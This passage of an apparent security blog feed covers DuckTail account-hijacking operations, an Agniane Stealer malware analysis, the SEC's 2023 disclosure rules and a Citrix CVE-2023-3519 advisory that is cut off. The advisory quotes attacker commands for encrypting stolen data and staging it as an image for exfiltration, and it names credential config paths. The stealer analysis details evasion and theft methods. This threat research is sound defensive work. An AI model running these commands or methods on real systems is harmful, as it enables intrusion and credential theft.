impersonating Adplexity. The download button leads to a Ducktail infected archive. Insights Gained In the following sections, we share insights about the threat actors operating DuckTail and the strategies they employ. Primary targets and industries While Ducktail is mostly known for targeting Facebook users, we observed threat actors stealing and abusing access to victim accounts on other advertising platforms, namely TikTok Business and Google Ads. This ability to pilfer multiple platforms is due to Ducktail’s general-purpose cookie stealing capabilities. Communication channels and techniques The threat actors use the following platforms to communicate and trade stolen information: Telegram Facebook Zalo (a Vietnamese messaging app) The threat actors set up Telegram bots to automatically handle data arriving from new victims. This allows them to pinpoint the most important information, like: the victim’s Facebook account information the number of detected ad accounts business manager accounts Figure 12: A bot introduces a new victim’s Facebook profile. An American with control over four personal ad accounts and three business manager accounts. Infiltration strategies Adding threat actor email addresses to compromised accounts One of the primary methods threat actors use to takeover a victim’s compromised account is by adding their own email address to that account. In the image below, Facebook emailed a security notification to a victim informing them that a threat actor has added an email address to their account. Figure 13: This screenshot shows a security notification warning a victim about a new email address added to their account - indicating that a Ducktail threat actor has begun a takeover of their Facebook account. Updating password and email for compromised accounts DuckTail threat actors change the password and email address of a Facebook account during takeover. Abusing Facebook Encrypted Notifications feature We observed an instance where, after taking over a victim’s Facebook account, the threat actor enabled the Encrypted Notifications setting. This way every Facebook email communication with the victim is encrypted - effectively preventing the victim from recovering their account. Using compromised LinkedIn accounts for communication While investigating communication between threat actors and victims on LinkedIn, we came across instances where threat actors contacted victims using compromised LinkedIn accounts. These compromised LinkedIn accounts belonged to users working in the digital marketing space. Some of the compromised LinkedIn accounts had more than 500 connections and 1000 followers. The high amount of connections/followers helped lend authenticity to the compromised accounts and facilitated the social engineering process for threat actors. How are the threat actors compromising LinkedIn accounts? We believe, with a medium-confidence level, that some of these compromised LinkedIn accounts were purchased in underground markets by DuckTail threat actors. We discovered an internal budgeting spreadsheet used by the DuckTail team which details their revenue and expenditures. One of the entries in the spreadsheet corresponded to the purchase of LinkedIn accounts. We believe, with a high-confidence level, that threat actors are compromising the LinkedIn accounts of users who fell victim to DuckTail’s initial attack where victims were enticed with fraudulent job posts and fake recruiters. We reached this conclusion after observing a conversation between members of the DuckTail group. One member directed another member to access a victim's Gmail account (using the stolen browser cookies), delete email entries related to LinkedIn (to clear traces), and change the account recovery email address to an attacker-controlled email. Compromising TikTok business accounts The image below shows the activity log page of a victim’s compromised TikTok Business account. The log depicts the threat actor inviting themselves to control the account and then performing actions. After three days, the targeted business notices and revokes their access. Figure 14: This is a TikTok business center activity log for a compromised account, showing the actions executed by the threat actor. Leveraging residential proxy services to access compromised accounts Our team observed DuckTail threat actors using “Residential Proxy” services to circumvent Facebook account compromise detections. In the image below, the attacker’s machine uses the “S5 Proxy” residential proxy service from the vendor - Interestingly, the UI also shows the threat actor’s own original IP address. We confirmed with an IP geolocation lookup that the threat actor’s original IP address maps to a city in Vietnam, further strengthening our theory that DuckTail is operated by Vietnam-based threat actors. Figure 15: This screenshot shows a threat actor connecting to a residential proxy in Konya, Turkey, before logging into the compromised Facebook account of a victim. Stolen Credentials Enter Underground Market Social media ad accounts are constantly targeted for hacking. Threat actors, like those behind the Ducktail operation, collect massive amounts of hacked accounts. But where do they end up? Hacked social media and ad accounts end up for sale in a busy Vietnamese-language underground market. Here is what we know about this market: Mainly Facebook accounts are sold It includes numerous publicly accessible Telegram groups DuckTail threat actors are active sellers Despite the illicit nature of these groups, they are public and easily accessible. Although it may be difficult for a novice to interpret the jargon and abbreviations that are heavily used in the community. Awareness of OPSEC among those involved appears to be be lacking or non-existent. Figure 16: In this screenshot, vendors offer access to hacked Facebook accounts on a Vietnamese Telegram group. Threat actors target ad accounts so they can access ad budgets. High ad budgets and long-term accessibility to accounts are attractive characteristics to threat actors. Facebook combats threat actors like Ducktail, who hack and abuse ad accounts on their platform, by automatically flagging suspicious accounts. Because of this, threat actors try to prolong the life of a compromised ad account. For this reason, hacked Facebook accounts are not interchangeable commodities. Depending on an account’s properties, it may range from very valuable to almost useless to buyers. Here are common properties that vendors and buyers check for in this underground market: The type of account (a personal ad account or a business manager account) The daily ad budget and payment threshold of an account The number of ad accounts a business manager account controls A successful business verification by Facebook If the account controls a page or profile with a verified badge The age of the account. Older accounts are more valuable than younger. The existence and validity of saved payment methods The account’s successful payment history. More successful payments indicate a more valuable account. We observed the following Vietnamese browser extension used for displaying account properties: Figure 17: A screenshot of the Vietnamese-designed browser extension used by threat actors to quickly assess social media business account details. Payments and Transactions We observed that an account deemed “low-grade” sells for around 350,000 Vietnamese dong (~$15 USD), while accounts considered valuable sell for around 8,000,000 Vietnamese dong (~$340 USD). When a transaction is complete, the seller hands over control of the hacked account by: Adding/inviting the buyer to control the account through Facebook (business manager) Providing the victim’s login and password to the compromised account Providing the victim’s exported browser cookies, thus replicating their logged-in session If the level of compromise is thorough, access to the victim’s email may be given on top of the above to maintain access even longer, and also be able to bypass MFA security measures. Conclusion In this blog, ThreatLabz provides a wealth of new insight for the research community. Understanding the operational methods and end-to-end journey of a threat actor like DuckTail is a form of protection. Because of our research team, we can confidently state: DuckTail is primarily run by Vietnamese-speaking cyber criminals who use Google Translate to communicate with potential victims over LinkedIn. DuckTail threat actors target personal, business, and ad accounts on platforms like TikTok, Facebook, LinkedIn, and Google, and use social engineering to infect devices. DuckTail threat actors are abusing themes of popular AI tools, like ChatGPT, to infect devices. DuckTail threat actors take extra measures to prevent raising security alarms by using private residential proxy services to log in to compromised accounts. DuckTail threat actors use strategic account takeover methods which they routinely use in their post-compromise procedures to prevent any form of account recovery by victims Hacked and/or compromised social media business ad accounts enter a primarily Vietnamese-based underground market where they are sold based on their perceived value. You can take steps to minimize the impact of a hacker by managing your saved payment methods in business ad accounts and making use of safeguards like daily spending limits, payment thresholds, etc. In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Zscaler Sandbox Detection The figure below shows the sandbox detection for the Windows shortcut (LNK) file which is used to kick start the DuckTail infection chain. Figure 18: Zscaler sandbox detection In addition to sandbox detection, Zscaler’s multilayered cloud security platform detects indicators at various levels. LNK.Downloader.Ducktail Win32.Dropper.Ducktail Win64.PWS.Ducktail Win32.Downloader.Ducktail Win32.PWS.Ducktail MITRE ATT&CK TTP Mapping ID TACTIC TECHNIQUE T1204.001 User Execution: Malicious Link User executes the shortcut .lnk file T1204.002 User Execution: Malicious File User executes the attached compressed/executable file T1027.001 Obfuscated Files or Information: Binary Padding Binary inflated in order to avoid sandboxing T1036.005 Masquerading: Match Legitimate Name or Location Drops malicious binaries into legitimate paths T1057 Process Discovery Checks for well known security software analysis tools T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage Telegram API used to exfiltrate user data T1070.006 Indicator Removal: Timestomp PE’s Timestamp header value are tampered Indicators of Compromise (IOCs) Fake sites set up by DuckTail threat actor marketingagency[.]social a1outreach[.]software mangogroup[.]sale la-roche-posay[.]click li-ning[.]agency li-ning[.]news hrm[.]social hrms[.]social mccann[.]fyi avalonorganics[.]work li-ningagency[.]news li-ningjod[.]news ogilvy[.]social narscosmetics[.]social yodo1game[.]software louisvuitton-social[.]news luoisviitton[.]news eucerin[.]work guessinc[.]work samsungagency[.]link brandresource[.]social recruiterofbrand[.]social brandrecruitment[.]social hrmmarketing[.]link marketingmanager[.]social recruitmentagency[.]social marketing-project[.]social nike-agency[.]link recuiter[.]company louisvuitton-agency[.]link louisvuitton-agencyjod[.]live mccann[.]expert ogilvysocial[.]company louisvuitton-hr[.]news louisvuitton-jod[.]chat hyundaimotorjob[.]social hyundaimotor[.]social hyundaimotorgroup[.]social adplexity[.]site adplexitydesk[.]tech fbadsguide[.]tech affiliateguide[.]tech newguide[.]tech businessmanagerads[.]tech businessmanager-update[.]info marketing-tool[.]info connectads[.]agency disruptiveadvertising[.]agency impressionagency[.]co themars[.]social ommmarketing[.]agency growmemarketing[.]agency ommmarketing[.]digital impressiondigitals[.]agency impressiondigital[.]info passions[.]agency brandstyle[.]agency brandstyle[.]digital Appendix Attacker-controlled Trello account Figure 19: An attacker-controlled Trello account used to host the malicious files. Screenshot shows the activity log. Wed, 30 ago 2023 07:08:00 -0700 Sudeep Singh Agniane Stealer: Dark Web’s Crypto Threat Introduction Agniane Stealer fraudulently takes credentials, system information, and session details from browsers, tokens, and file transferring tools. Agniane Stealer also heavily targets cryptocurrency extensions and wallets. Once it obtains the sensitive data, Agniane Stealer transfers that stolen data to command-and-control [C&C] servers, where threat actors can act upon the stolen information. We believe Agniane Stealer belongs to the Malware-as-a-Service (MaaS) platform Cinoshi Project, which was discovered in early 20231, and much of its code infrastructure is modeled after the platform. Its close relationship to Cinoshi Project means Agniane Stealer has been available for sale on several dark web forums. The threat actors responsible for Agniane Stealer utilize packers to maintain and regularly update the malware’s functionality and evasions features. Key Takeaways Stealing Capabilities: Agniane Stealer is an information stealer that takes stored credentials from web browsers, Telegram sessions, Discord tokens, Steam, WinSCP, and Filezilla sessions. In addition, It saves a screenshot of the user’s desktop, quickly collecting OpenVPN profiles and system information. Crypto Hungry: Agniane Stealer is a prolific cryptocurrency data exfiltrator with extensive support for nearly 70+ crypto extensions and 10+ crypto wallets. Evasion Techniques: Agniane Stealer implements numerous methods to detect anti-analysis software like malware sandboxes, emulators, VirtualBox, and other analysis tools. Availability: Agniane Stealer is part of Cinoshi Project - a MaaS that offers services and subscriptions on the dark web. Agniane Stealer Promoted on Telegram During our analysis, we found a Telegram channel promoting and selling Agniane Stealer. The Telegram channel owner posts consistently about feature lists, updates, and pricing. We speculate the owner of the Telegram channel is the malware author. The following Agniane Stealer feature list was found on the Telegram channel: “The stealer is written in C# It loads the libraries used; build weight is 419 KB. Perfectly crypted by mass-crypters, such as EasyCrypter, exe2pack, PackLab and others. Supports stealing passwords and cookies from browsers based on Chromium and Gecko. Support for more than 70+ crypto extensions from browsers, as well as more than 10+ crypto wallets. Collection of Telegram sessions, Discord tokens, Steam sessions, Winscp and Filezilla sessions. Saving screenshots from all monitors with detailed information about them. Collection of all information about the victim's computer. Convenient filter for domains that are important to you; search in passwords and cookies of your domains and record the result. Collection of all possible OpenVPN profiles. Collecting a list of all installed applications on the computer. The ability to prohibit the launch of the build on virtual computers, emulators (configurable on the panel). Protection of your build from running on Virustotal, AnyRun and similar servers (configurable on the panel). Protection against repeated logs, as well as protection against empty logs (configurable on the panel). Collection of files from the user's desktop and documents (file extensions are configured on the panel). Log collection is carried out in memory, without using a disk to store materials from the log” The following information regarding price was also found: “💎 The cost of our styler Steeler monthly subscription — $50 Three-month subscription - $120 $150 (20% off) Lifetime subscriptions are not for sale and never will be for sale!” Relationship to Cinoshi Project This screen indicates that Agniane Stealer is most likely part of the Cinoshi Project. Figure 1: Project information indicating that Agniane Stealer is very likely part of the Cinoshi Project Agniane Stealer User Interface In the following section, we illustrate the web experience when interacting with Agniane Stealer on the dark web. The screens below are available through the same Telegram channel we mentioned above. Builder Tab ​​Below, you can see the Builder tab showing builder information. With this tab, cyber criminals can build custom variants of Agniane Stealer. Figure 2: Builder tab showing builder information Home Tab In the screenshot below, you can see the Agniane Stealer Home tab. The interface encourages you to follow the Telegram channel in case the domain is blocked. In addition, this screen indicates the status of the gate server. Figure 3: Home tab showing instructions and status Logs Tab On this screen, you can see a list of victim logs from all around the world. The list includes details relevant to a threat actor like Passwords, Wallets, and Cookies. Figure 4: Logs tab showing victim logs Settings Tab The Stealer settings section allows a threat actor using Agniane Stealer to configure settings in a way that facilitates their nefarious intentions. A threat actor can: disable logs, extend libraries, and even prevent the malware from running during security inspection and analysis using anti-analysis techniques. Figure 5: Stealer settings in Settings tab The Telegram notification settings screen shows you how to set up Telegram notifications on your system and it lists various custom variables that correspond to relevant stolen data: number of passwords in the log, username, etc. Figure 6: Telegram notification settings in Settings tab The fake-error settings option also functions as a form of protection for Agniane Stealer. Enabling fake error messages allows threat actors to remain undetected for longer periods of time. Figure 7: Fake-error settings in Settings tab Parsers Tab This screen displays options to parse victim logs. A threat actor can use a Discord token or use a login pass (feature under development). Figure 8: Parsers tab showing options Technical Analysis Agniane Stealer, like many other information stealers, is written in C#. Our team determined that the Agniane Stealer sample under analysis is the first version of the build and was not packed or obfuscated, but the latest version has undergone packing and obfuscation. Upon execution, Agniane Stealer generates a random 32-bit string using the character set “A-Z0-9”. The generated random string is used as the sub-folder name, which is created in the %TEMP% folder. This is where the stolen data is kept. After that, the Agniane Stealer extracts a C&C URL (“https[ : ]//central-cee-doja [.] ru/”) from a hardcoded Base64 string. Anti-Analysis Techniques Checks for debugger The malware sample calls the CheckRemoteDebuggerPresent Windows API to check if it's being run in a debugger. If Agniane Stealer detects a debugger, then it will exit from memory and stop running, making debugging harder. Verifies tick counts Agniane Stealer uses an emulator program to record the initial tick count, proceeds to sleep, and upon awakening, measures the tick count once more. If the difference between the initial and final tick counts is less than 10L, the program returns True, exits from memory, and stops running. Detects analysis tools Agniane Stealer checks the memory for analysis tools. If it finds an analysis tool running, Agniane Stealer will exit. Our analysis uncovered the following analysis tools: Processhacker Netstat Netmon Tcpview Wireshark Filemon Regmon cain Locates user’s system Hosting providers employ various security measures for malware detection. It is in the interest of the threat actors to remain undetected. Thus, the future course of execution is determined based on the geolocation data retrieved from the server using the request hxxp[:]//ip-api[.]com/line/fields=hosting. If the victim’s machine belongs to a hosting provider, execution is terminated. Obscures identity with legitimate DLL handles Agniane Stealer tries to obtain the handle of several DLLs using the GetModuleHandle function. If successful, Agniane Stealer uses the innocuous DLL handle to hide itself from potential discovery. The malware targets the following DLLs: SbieDll SxIn Sf2snxhk cmdvrt32 Identifies virtual machines Agniane Stealer utilizes the WMI queries to detect whether it is running inside a virtual environment and terminates execution if True. QUERY DETAILS Select * from Win32_ComputerSystem If Manufacturer is Microsoft corporation and Model is VIRTUAL return True or if either Manufacturer contains vmware or Model is VirtualBox return True, and malware exits from memory. SELECT * FROM Win32_VideoController Retrieves information about video controllers (also known as graphics cards) on a Windows computer. Uses the GetPropertyValue method to compare names with VMware and VBox. If a match is found, then True is returned and Agniane Stealer quits execution. Stealer Capabilities Agniane Stealer possesses several form-grabbing capabilities. Let’s dive into those. Sidesteps dependencies Upon execution, Agniane Stealer, with a compact sample size, adeptly operates on both 32 and 64-bit systems, sidestepping any reliance on pre-existing dependencies. Intriguingly, it dynamically retrieves a set of 5 DLLs from its C&C servers, leveraging legitimate third-party DLLs to enhance its functionalities and capabilities. It employs the following: SQLite.dll SQLite.EF6.dll SQLite.Linq.dll SQLite.Interop.dll(x86 & x64bit) Steals from the following areas: AREAS DETAILS Telegram and Steam Sessions Steals user tokens for logged-in Discord and Steam sessions, and OpenVPN profiles; sends data to threat actors. Tries to search Telegram software under the “\\AppData\\Roaming\\Telegram” directory. If found, Agniane Stealer steals Telegram Sessions and archives it. Tries to locate the Telegram process. If found, the malware kills the process and grabs all the Telegram files except emojis and user_data. Then, Agniane Stealer archives all remaining directories. Browser cookies Agniane Stealer targets login data, history, and web data from the following browsers: OperaGX Chrome Opera FireFox Vivaldi Brave Edge Yandex Chromium Domains Agniane Stealer tries to harvest login credentials and cookies from following domains: If any passwords are found in the domains listed above, then Agniane Stealer places them into the Important Detects.txt file and archives them. SSH File Transfer Protocol Agniane Stealer pilfers WinSCP to collect Hostname, username, and password from all sessions by traversing through Software\\Martin Prikryl\\WinSCP 2\\Sessions registry entry. Filezilla FTP Software Agniane Stealer reads FileZilla\\recentservers.xml and searches for the <server> tag. If available, then Agniane Stealer grabs Hostname, username, and password. If the XML path was not found, then Agniane Stealer logs that it was unable to find the FileZilla session. Computer System Agniane Stealer gets the external IP address of the victim's machine using In addition, Agniane Stealer collects victims Windows version using SELECT * FROM win32_operatingsystem. Then, it obtains the bit version of the machine using Windows Registry and checks the value. If the value matches, then it is x86 but if it doesn’t then that indicates a x64bit machine. Uses WMI to collect Installed Antiviruses: Collects all installed antivirus software with the WMI query Select * from AntivirusProduct. GPUName: Using WMI query SELECT * FROM Win32_VideoController and GetEnumerator() method Compares with "VMware SVGA 3D" CPU name: Using WMI query SELECT * FROM Win32_Processor tries to access the CPU name of the victim's machine. Captures a screenshot Agniane Stealer captures a screenshot of the victim’s desktop using Bitmap. Checks RAM By querying WMI to Select * From Win32_ComputerSystem, Agniane Stealer calculates RAM allocated to the victim's machine. Exfiltrates data Agniane Stealer enumerates the users Desktop and the Documents folder for the files with .txt,.doc,.mafile,.rdp, and .db extension. The discovered files are then copied to the previously created subfolder under the %TEMP% location. Finds installed applications Agniane Stealer collects all applications installed on the victim’s machine by querying the Registry Key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall. Then, it stores that information in the Installed Apps.txt file, as you can see in the image below. Figure 9: Example information collected by Agniane Stealer Agniane Stealer keeps a record of its actions in a file named execution log.txt, which documents all the operations executed and associated information. Exfiltrates crypto data In addition to form-grabbing, Agniane Stealer also utilizes clipper qualities to exfiltrate cryptocurrency data. Agniane Stealer is a prolific cryptocurrency data exfiltrator with extensive support for nearly 70+ crypto extensions and 10+ crypto wallets. See the Crypto Extension & Wallet table at the bottom of this blog for a complete list. How it works Agniane Stealer uploads all the exfiltrated data to: hxxps[:]// After uploading the stolen data to a remote server, the Agniane Stealer removes its traces from the victim’s system by deleting the sub-folder. We observed that the latest version of the Agniane Stealer uses ConfuserEx Protector. Also, the recent variant employs more obfuscation techniques when compared to the earlier version, which makes it harder for security modules to detect. In the images below, Figure 10 is from the earlier version of Agniane Stealer where the code is human-readable, and Figure 11 is from the latest version of Agniane Stealer where the same code is obfuscated through ConfuserEx Protector. The Figure 12 is showing the de-obfuscated code. Human-readable code Figure 10: Human-readable Agniane Stealer sample code Obfuscated code Figure 11: Obfuscated Agniane Stealer code sample Deobfuscated code Figure 12: Deobfuscated Agniane Stealer code sample C&C Communication In the case of Agniane Stealer, threat actors are using a command-and-control (C&C) server to move and store stolen data. A C&C server is a system controlled by the cybercriminals who distribute stealer malware to take sensitive data that allows them to manage and control compromised devices remotely. In the image below, you can see the: POST Request Host Name ZIP file payload PK header indicates the transmission of an archive file Figure 13: Data stolen by Agniane Stealer and sent to C&C server From here, Agniane Stealer downloads the SQLite dependency DLL, which is shown in the image below. Figure 14: SQLite dependency DLL files are downloaded Conclusion As a purchasable service on the dark web, Agniane Stealer is a formidable addition to the Cinoshi Project and its arsenal of malware. Agniane Stealer’s ability to discreetly gather credentials and cryptocurrency details, and transfer that stolen data to command-and-control (C&C) servers poses a significant threat in the cybersecurity landscape. Agniane Stealer looks for various types of anti-analysis software to avoid detection. Threat actors are constantly selling new malware services on the dark web and adding features to MaaS platforms. Our insights from analyzing Agniane Stealer demonstrate the importance of staying alert, ongoing research, and monitoring. The Zscaler ThreatLabz team continuously monitors for new threats and shares its findings with the wider community. Zscaler Coverage Zscaler's multilayered cloud security platform detects indicators at various levels. During the investigation of this campaign, Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Zscaler ensured coverage for the payloads seen in these attacks via advanced threat signatures. Figure 15: The Zscaler Cloud Sandbox successfully detected the malware. To learn more about coverage, visit the Zscaler Sandbox webpage or Win32.PWS.Agniane in the Threat Library, where we list all threats and threat information. Indicators of Compromise (IOCs) Agniane Stealer indicators of compromise MD5 HASH VALUES DESCRIPTION 522101881b87ccda4d78fac30e951d19 Agniane Stealer 0d20e90382f881116201ac7c9298aab6 Agniane Stealer a1b5e20b58d23b26f640f252ece0891b Agniane Stealer 5C0F65523F7ECB773C599B59D5CC3578 Agniane Stealer a2b20120a92c3de445b0b384a494ed39 Agniane Stealer d811a57bc0e8b86b449277f9ffb50cc9 Agniane Stealer b62ef0920a545f547d6cd3cd2abd60d2 Agniane Stealer Host Name Crypto Extensions & Wallets Tronlink Extension Browser Extensions Nifty Wallet Extension Metamask Wallet Extension Math Wallet Extension Coinbase Extension BinanceChain Extension Brave Wallet Extension Guarda Wallet Extension Equal Wallet Extension BitApp Wallet Extension iWallet Extension Wombat Extension Authenticator Extension EOS Authenticator Extension BrowserPass Extension MYKI Extension Splikity Extension CommonKey Extension Zoho Vault Extension Norton Password Manager Extension Avira Password Manager Extension Trezor Password Manager Extension MEW CX Extension Coin98 Extension NeoLine Extension Terra Station Extension Keplr Extension Sollet Extension ICONex Extension KHC Extension TezBox Extension Byone Extension OneKey Extension Trust Wallet Extension MetaWallet Extension Exodus Extension Jaxx Liberty Extension Atomic Wallet Extension Electrum Extension Mycelium Extension Coinomi Extension GreenAddress Extension Edge Extension BRD Extension Samourai Wallet Extension Copay Extension Bread Extension Airbitz Extension KeepKey Extension Trezor Extension Ledger Live Extension Ledger Wallet Extension Bitbox Extension Digital Bitbox Extension YubiKey Extension Google Authenticator Extension Microsoft Authenticator Extension Authy Extension Duo Mobile Extension OTP Auth Extension FreeOTP Extension Aegis Authenticator Extension LastPass Authenticator Extension Dashlane Extension Keeper Extension RoboForm Extension KeePass Extension KeePassXC Extension Bitwarden Extension NordPass Extension LastPass Extension Zcash Client Armory Client Bytecoin Client Jaxx Client Exodus Client Ethereum Client Electrum Client AtomicWallet Client Guarda Client Coinomi Client References *1 = Agniane Stealer was first discovered by @MalGamy12 Tue, 22 ago 2023 17:20:04 -0700 Mallikarjun Piddannavar The Impact of the SEC’s New Cybersecurity Policies Introduction The rapid advancement of technology has led to an increasing number of cybersecurity incidents that pose significant risks to organizations, their stakeholders, and the general public. Recognizing the importance of transparent and timely reporting of such incidents, the U.S. Securities and Exchange Commission (SEC) announced on July 26, 2023, that it has adopted final rules regarding cybersecurity disclosure requirements for public companies. These rules mandate the disclosure of material cybersecurity incidents and information related to cybersecurity risk management, strategy, and governance. This technical blog post delves into the key aspects of these newly adopted rules and their implications for public companies. Key Takeaways - Timely incident reporting: New Item 1.05 of Form 8-K requires reporting of material cybersecurity incidents within four business days, promoting swift transparency. Failure to timely file will not impact Form S-3 eligibility. - Limited reporting delay for security: Possible delay in disclosure for national security risks with U.S. Attorney General’s approval, up to 120 days with SEC consent. - Comprehensive incident disclosures: Incomplete Form 8-K data requires acknowledgment and later amendment filing, reducing redundancy. - Broadened incident definition: Final rules broaden “cybersecurity incident” to include related unauthorized events, for a more holistic view. - Annual risk reporting (Form 10-K): Beginning with annual reports for fiscal years ending on or after December 15, 2023, Regulation S-K Item 106 mandates yearly reporting on cybersecurity risk, strategy, governance, board oversight - without mandatory disclosure of board members’ expertise. - Foreign Private Issuers: The rules require comparable disclosures by foreign private issuers on Form 6-K for material cybersecurity incidents and on Form 20-F for cybersecurity risk management, strategy, and governance. - Compliance timing: Effective 30 days post Federal Register publication. Timelines will vary according to the size of a company. Form 8-K: Incident Reporting The finalized rules introduce a crucial change in the disclosure process through the addition of Item 1.05 to Form 8-K. This new requirement necessitates the reporting of material cybersecurity incidents within four business days from the company’s determination that the incident is material (not the date of discovery of the incident). Although the scope of disclosure in Item 1.05 has been refined, some notable deviations from the proposed rules are evident. Limited Delay in Reporting In cases where the disclosure of cybersecurity incidents could potentially jeopardize national security or public safety, a delay in reporting is permissible. However, this delay is subject to the U.S. Attorney General’s determination and cannot extend beyond a specified period, generally capped at 120 days. Such extensions require the SEC’s approval through an exemptive order. Updated Incident Disclosures When the required information for the Item 1.05 Form 8-K disclosure is not yet ascertainable or unavailable at the time of filing, the company must acknowledge this fact in the Form 8-K and subsequently file an amendment within four business days after obtaining the missing information. Notably, subsequent periodic filings will not necessitate updates based on this information. Aggregation of Incidents The concept of aggregating cybersecurity incidents is a noteworthy change from the proposed rules. While the requirement to disclose individually immaterial incidents has been omitted, the final rules encompass a broader definition of a cybersecurity incident. According to the SEC Cybersecurity Risk Management, Strategy, Governance, and Incident Disclosure, this definition encompasses “a series of related unauthorized occurrences,” enabling a more comprehensive overview of the incident-related disclosures. Form 10-K: Cybersecurity Risk Management, Strategy, and Governance Building upon the proposed rules, the finalized rules introduce a new Item 106 to Regulation S-K. This mandates an annual reporting of specific cybersecurity aspects, including risk management, strategy, governance, and the board’s oversight of cybersecurity risks. However, a departure from the initial proposal is that the final rules do not require the disclosure of board members’ cybersecurity expertise. Effective Date and Compliance Timing Compliance timelines vary based on the type of disclosure and the size of the reporting company: Companies, excluding smaller reporting companies, must comply with Item 1.05 of Form 8-K within 90 days of the adopting release’s publication or by December 18, 2023, whichever is later. Smaller reporting companies are granted 270 days from the adopting release’s publication, or until June 24, 2024, to comply with Item 1.05 of Form 8-K. For Item 106 of Regulation S-K, all companies must commence compliance with their annual reports for fiscal years ending on or after December 15, 2023. Structured data requirements apply to all companies one year after the initial compliance date for the corresponding disclosure. Conclusion The SEC’s new cybersecurity rules mark a significant milestone in enhancing transparency and accountability in the face of growing cybersecurity threats. These rules mandate the timely reporting of material incidents and the provision of comprehensive information about cybersecurity risk management, strategy, and governance. As companies prepare to comply with these regulations, the landscape of cybersecurity disclosure in the corporate world will undergo transformative changes by promoting informed stakeholders and robust risk management practices. Fri, 18 ago 2023 10:15:12 -0700 Deepen Desai Security Advisory: Remote Code Execution Vulnerability (CVE-2023-3519) Introduction On 18 July 2023, Citrix published a security advisory that addressed a critical vulnerability with CVSS score 9.8 for CVE-2023-3519 for RCE (Remote Code Execution) in NetScaler ADC (formerly known as Citrix ADC) and NetScaler Gateway (formerly known as Citrix Gateway). This vulnerability created a lot of buzz in the last several days. Many reports claim that the vulnerability was being exploited as a zero-day attack in the wild as threat actors were dropping a web shell onto organization's critical infrastructure. The advisory from Citrix also includes additional vulnerabilities affecting NetScaler users. CVE-2023-3466 - A reflected Cross-Site Scripting (XSS) vulnerability which requires the victim to access an attacker-controlled link in the browser while being on a network with connectivity to the NSIP. NetScaler IP (NSIP) address is the IP address where you access the NetScaler for management purposes. CVE-2023-3467 - A Privilege Escalation vulnerability that requires authenticated access to NSIP or SNIP with management interface access. A subnet IP address (SNIP) is a NetScaler owned IP address that is used by NetScaler to communicate with the servers. Key Takeaways New Vulnerability Discovered: A new vulnerability, CVE-2023-3519, has been discovered that impacts NetScaler ADC NetScaler Gateway applications. Upgrade Your Application: If you see your ADC or Gateway version below, Zscaler strongly urges you to upgrade to a safe version. NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-55.297 NetScaler ADC 12.1-NDcPP before 12.1-55.297 Possible Execution/PoC CVE-2023-3519 could allow an unauthenticated threat actor to trigger a stack buffer overflow in the NetScaler Packet Processing Engine (nsppe) process by sending a specially crafted HTTP GET request. Since the nsppe runs as root, successful exploitation would likely result in arbitrary code execution as the ‘root’. This is an example of the HTTP request with GET method: Figure 1: Example Packet Capture with shell code A proof-of-concept (PoC) for CVE-2023-3519 in Citrix ADC can be found on GitHub. Attack Chain A threat actor can exploit CVE-2023-3519 by uploading files containing malicious web shells and scripts, allowing them to scan networks and extract sensitive information. A server's configuration files contain encrypted passwords that can be viewed and decrypted by decryption keys that are available on the same server. Thus, making configuration files an obvious target for threat actors. By decrypting Active Directory credentials, a threat actor can retrieve a wide range of information, including: details about users computers groups subnets organizational units Figure 2: Attack chain of Citrix Gateway CVE-2023-3519 unauthenticated remote code execution 1. Initial Access - According to CISA, a threat actor can upload a TGZ File (a compressed archive created using GZIP) containing a generic web shell, discovery script, and setuid binary file on the Citrix's NetScaler Application Delivery Controller (ADC) application. Through the web shell, the threat actor can execute remote commands on the compromised system, establishing a reliable command and control channel. 2. Privilege Escalation - The uploaded TGZ file consists of a setuid binary file which is used by threat actors to exploit Elevation Control Mechanism and gain elevated permissions on a system. 3. Credential Access - A threat actor uses the NetScaler configuration files, located in /flash/nsconfig/keys/updated/* and /nsconfig/ns.conf, to find an encrypted password that can be decrypted by the key stored on the ADC application. Using these keys, the Active Directory credentials are decrypted from the configuration file. 4. Discovery - The threat actor uses the newly acquired, decrypted credentials to query the Active Directory for trusted domains, organization units (OU), computers, users, etc. within the network that can be exploited to move laterally or escalate privileges. 5. Collection - The threat actor uses the 'tarball' command to compress the collected data and uses 'openssl' to encrypt the data. The following command is used by the threat actor to collect the compromised data from the infected system: tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k <> -out /var/tmp/test.tar.gz 6. Defense Evasion - Exfiltrated, collected data can be uploaded as an image file to a web accessible path to bypass detection engines using this command: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png. As per public reports, a segmented environment where ADC applications were deployed prevented the threat actors from discovering critical infrastructure. The threat actors attempted to: Execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets. Verify outbound network connectivity with a ping command (ping -c 1 Execute host commands for a subnet-wide DNS lookup. Like the reports state, the threat actors also attempted to delete their artifacts. They deleted the authorization configuration file (/etc/auth.conf) to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI). Normally, an organization would need to reboot into single user mode (which may have deleted artifacts from the device) to regain access to the ADC application. However, in this case, the victim used an a readily available SSH key to gain access into the appliance without rebooting. The threat actor’s post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The threat actors implanted a second web shell on the victim that they later removed. This was likely a PHP shell with proxying capability. The threat actors likely used this to attempt proxying SMB traffic to the DC (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity. Figure 3: Metasploit releases the exploit for CVE-2023-3519 Affected Products The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities: NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.13 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-91.13 NetScaler ADC 13.1-FIPS before 13.1-37.159 NetScaler ADC 12.1-FIPS before 12.1-55.297 NetScaler ADC 12.1-NDcPP before 12.1-55.297 Mitigations Zscaler has observed exploits of CVE-2023-3519 on unmitigated applications. Zscaler strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the 